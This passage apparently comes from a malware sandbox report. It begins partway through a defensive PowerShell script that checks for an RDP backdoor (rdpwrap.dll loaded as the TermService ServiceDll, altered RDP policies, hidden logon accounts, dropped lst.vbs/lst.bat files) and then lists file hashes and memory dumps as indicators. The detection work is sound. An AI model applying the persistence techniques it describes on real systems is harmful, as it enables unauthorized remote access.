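    # lst.vbs / lst.bat sit in the infected user's profile; check every profile, not just the current one.
    foreach ($userDir in Get-ChildItem 'C:\Users' -Directory) {
        $paths += Join-Path $userDir.FullName 'AppData\Local\Microsoft\Windows\lst.vbs'
        $paths += Join-Path $userDir.FullName 'AppData\Local\Microsoft\Windows\lst.bat'
    }
    foreach ($p in $paths | Where-Object { Test-Path $_ -PathType Leaf }) {
        $hash  = (Get-FileHash -Path $p -Algorithm SHA256).Hash
        $known = $KnownSha256[(Split-Path $p -Leaf)]
        $label = if ($hash -eq $known) { "$p (SHA256 matches this report)" } else { "$p (SHA256 $hash)" }
        New-Finding 'Dropped file present' $label $true
    }
}

$findings = @(Test-TermServiceDll) + @(Test-RdpPolicyValues) + @(Get-HiddenLogonAccounts) +
            @(Get-PrivilegedGroupMembers) + @(Get-DroppedArtefacts)
$findings | Where-Object Suspect | Format-Table Check, Value -AutoSize -Wrap
```

The ServiceDll check is the one to prioritise: with rdpwrap.dll loaded into svchost as the Terminal Services provider, restoring fDenyTSConnections alone does not close the door. Note that the j4dsucc1.exe check will usually come back empty, since the sample deletes that file itself, so its absence is not evidence the host is clean.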
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
C:\Program Files\Common Files\Services\rdpwrap.dll
  MD5    461ade40b800ae80a40985594e1ac236
  SHA1   b3892eef846c044a2b0785d54a432b3e93a968c8
  SHA256 798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
  SHA512 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

C:\Program Files\Common Files\Services\rdpwrap.ini
  MD5    214a63289660657dcd4824e206934256
  SHA1   6a2d9e5fa9a031d46abe368d0f37c323b7fdc8d4
  SHA256 70a86b3d8e18e3bec2b33874a84bf09155b896f89dc7088b8a1a8324996eb0ae
  SHA512 34b09c84d5d7690d5012048f3ddfed4421484f0f05bd9716d3ffc05e595c20e9cb7fabea0f530b81ded668f874c7fef686afd3f0d0559c6e7e1576fecd719683

C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
  MD5    5c33afac78dc3bb35f1d2f48e23456ce
  SHA1   79081c8ed707cf527e14d7b934b83e62a933b0d8
  SHA256 1d1f284c9317e4e268e7ea4b129f557af90a2cc1861ee62d1b988636856aa552
  SHA512 ab273abc5e4a320daf79f166286687574b9a5c1cce5e31f24e2d97ab8ccf98a18e41f64bcd6af8efbe7a7268681a94b4d6accad13dd3b9e56ba8133f61da97c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs
  MD5    4c9bf0719250bbbf5a44ad421e0c00f4
  SHA1   dd686bfa711732d30611b0bdcc1f270ba3828180
  SHA256 12bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f
  SHA512 d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0

C:\Users\Public\j4dsucc1.exe (also recorded under the NT path \??\c:\Users\Public\j4dsucc1.exe with identical hashes)
  MD5    bb9c7628c643c5232a64a45b8814bff2
  SHA1   12eded5c10f86eb3050a8b4f0ae2b17de58c70a9
  SHA256 c7667ceb0efa8aa8b7bd763d779424b5445ca9f56b9e526a395f4044ba4acc69
  SHA512 85ea8886b72137c18c442f6239211cb7a27da9fdfeba43bf848fd72ece8b37424f2c3c651aae560f5e6381fe05483fbe838a92277b17267aae49bd15e999b287

\??\PIPE\samr (three identical entries; the SAM RPC pipe opened by the net user / net localgroup commands)
  MD5    d41d8cd98f00b204e9800998ecf8427e
  SHA1   da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
  (these are the hashes of zero-length input, so the pipe captures hold no data and are not usable as indicators)

\??\c:\Users\Public\552pku1a.inf
  MD5    17f41655ae1f701adfddafa57d304a28
  SHA1   5ee5f8fc880fc6b2d160aecd8c38d1377f3ec431
  SHA256 80d0a556bdc500f1bdc9443af7b197fc3df06a5c0a2482f10d70f5b91524985d
  SHA512 0c78565f97dce119990de9bcf7df087948f9a2e6a20483097c2e6394257ed3a5c5544d2bf0125a2d50881d224e37a757a443f97fb3de3754f825a7347c9b9675

Memory dumps (file, size):
  memory/820-58-0x000007FEFC3C1000-0x000007FEFC3C3000-memory.dmp   8KB
  memory/968-64-0x0000000075AB1000-0x0000000075AB3000-memory.dmp   8KB
  memory/1688-59-0x0000000002446000-0x0000000002465000-memory.dmp  124KB
  memory/1688-55-0x000007FEF5D4E000-0x000007FEF5D4F000-memory.dmp  4KB
  memory/1688-54-0x000007FEF2EA0000-0x000007FEF3F36000-memory.dmp  16.6MB
  memory/1688-56-0x0000000002440000-0x0000000002442000-memory.dmp  8KB